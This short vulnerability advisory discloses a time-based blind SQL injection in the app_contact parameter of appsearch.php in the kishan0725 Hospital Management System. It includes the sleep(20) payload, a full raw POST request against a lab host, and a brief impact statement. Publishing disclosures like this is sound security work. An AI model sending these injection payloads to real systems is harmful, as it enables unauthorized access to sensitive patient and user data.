SQL Injection vulnerability in kishan0725 Hospital Management System thru commit 4770d740f2512693ef8fd9aa10a8d17f79fad9bd March 21, 2021,
allows attackers to sql commands via app_contact parameter on /appsearch.php directory.
URL: <http://localhost/Hospital-Management-System/appsearch.php>
Parameter: app_contact
Payload: '%2b(select*from(select(sleep(20)))a)%2b'
POST /Hospital/appsearch.php HTTP/1.1
Host: 192.168.7.105:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: <http://192.168.7.105:8080>
Connection: close
Referer: <http://192.168.7.105:8080/Hospital/admin-panel1.php>
Cookie: PHPSESSID=rllrv34sf52l6ff6p36ahq7eki
Upgrade-Insecure-Requests: 1
app_contact=Test'%2b(select*from(select(sleep(20)))a)%2b'&app_search_submit=Search
the server will sleep for 20 seconds.
<https://github.com/kishan0725/Hospital-Management-System/blob/4770d740f2512693ef8fd9aa10a8d17f79fad9bd/appsearch.php#L16>
Exposes Sensitive Company Data: Using SQL injection, attackers can retrieve and alter data, which risks exposing sensitive company data stored on the SQL server. Compromise Users' Privacy: Depending on the data stored on the SQL server, an attack can expose private user data, such as credit card numbers.